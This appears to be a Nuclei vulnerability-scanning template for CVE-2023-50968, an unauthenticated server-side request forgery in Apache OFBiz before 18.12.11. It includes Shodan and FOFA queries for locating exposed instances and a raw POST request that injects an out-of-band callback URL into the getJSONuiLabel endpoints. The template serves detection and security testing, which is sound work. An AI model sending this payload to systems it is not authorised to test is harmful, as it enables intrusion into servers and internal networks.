id: CVE-2023-50968

info:
  name: Apache OFBiz < 18.12.11 - Server Side Request Forgery
  author: your3cho
  severity: high
  description: |
    Arbitrary file properties reading vulnerability in Apache Software Foundation Apache OFBiz when user operates an uri call without authorizations. The same uri can be operated to realize a SSRF attack also without authorizations. Users are recommended to upgrade to version 18.12.11, which fixes this issue.
  reference:
    - https://lists.apache.org/thread/x5now4bk3llwf3k58kl96qvtjyxwp43q
    - http://www.openwall.com/lists/oss-security/2023/12/26/2
    - https://nvd.nist.gov/vuln/detail/CVE-2023-50968
    - https://issues.apache.org/jira/browse/OFBIZ-12875
    - https://ofbiz.apache.org/download.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-50968
    cwe-id: CWE-918,CWE-200
    epss-score: 0.23447
    epss-percentile: 0.96556
    cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 4
    vendor: apache
    product: ofbiz
    shodan-query:
      - html:"OFBiz"
      - http.html:"ofbiz"
      - ofbiz.visitor=
    fofa-query:
      - app="Apache_OFBiz"
      - body="ofbiz"
      - app="apache_ofbiz"
  tags: cve,cve2023,apache,ofbiz,ssrf

variables:
  str: "{{rand_base(6)}}"

http:
  - raw:
      - |
        POST /partymgr/control/{{path}} HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        {{parameter}}={"http://{{interactsh-url}}/api":"{{str}}"}

    payloads:
      path:
        - getJSONuiLabel
        - getJSONuiLabelArray
      parameter:
        - requiredLabel
        - requiredLabels

    attack: clusterbomb
    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: word
        part: header
        words:
          - 'OFBiz.Visitor='
# digest: 4a0a00473045022100a7c632b2971df4f69ad28132c54b26a3d0b8a8e45c8442612da9072e45190ceb022032552a4f03e7a272c0b0ef83cfe0e8c6cb5517eb9c443aab72ab8689070c8158:922c64590222798bb761d5b6d8e72950